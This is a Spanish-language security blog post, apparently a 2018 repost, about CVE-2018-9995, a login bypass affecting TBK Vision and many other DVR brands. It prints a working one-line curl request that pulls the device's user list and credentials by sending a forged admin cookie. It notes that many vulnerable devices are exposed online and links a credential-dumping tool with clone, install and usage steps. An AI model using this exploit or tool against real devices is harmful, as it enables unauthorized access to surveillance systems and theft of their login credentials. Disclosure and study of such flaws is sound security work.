[Repost 2018] TBK Vision - DVR Login Bypass ( CVE-2018-9995 ) - part 2

En un articulo anterior presente una vuln que me permitía obtener las credenciales de cierto modelo de DVR.

El "Exploit" se puede resumir a una unica linea con curl:


$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"

Resulta que el hallazgo no corresponde a un vendor en particular como originalmente supuse.




Durante el proceso de investigación de la vulnerabilidad  pude  identificar  nuevos vendors afectados. Estos pueden distinguirse por los "banners" propios del formulario de autenticacion. Algunos ejemplos:




















etc...

Finalmente una vez adentros son todos iguales (de vulnerables).











On The Wild:







Claramente los equipos expuestos no son pocos ! 

TOOL:
Ahora si:

https://github.com/ezelf/CVE-2018-9995_dvr_credentials

Quick start


usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt



help

usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]

[+] Obtaining Exposed credentials

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit
  --host HOST    Host
  --port PORT    Port

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81





Saludos,





Comentarios

Entradas populares de este blog

[repost] MÚLTIPLES VULNERABILIDADES ( ICS ) - SCHNEIDER ELECTRIC - 6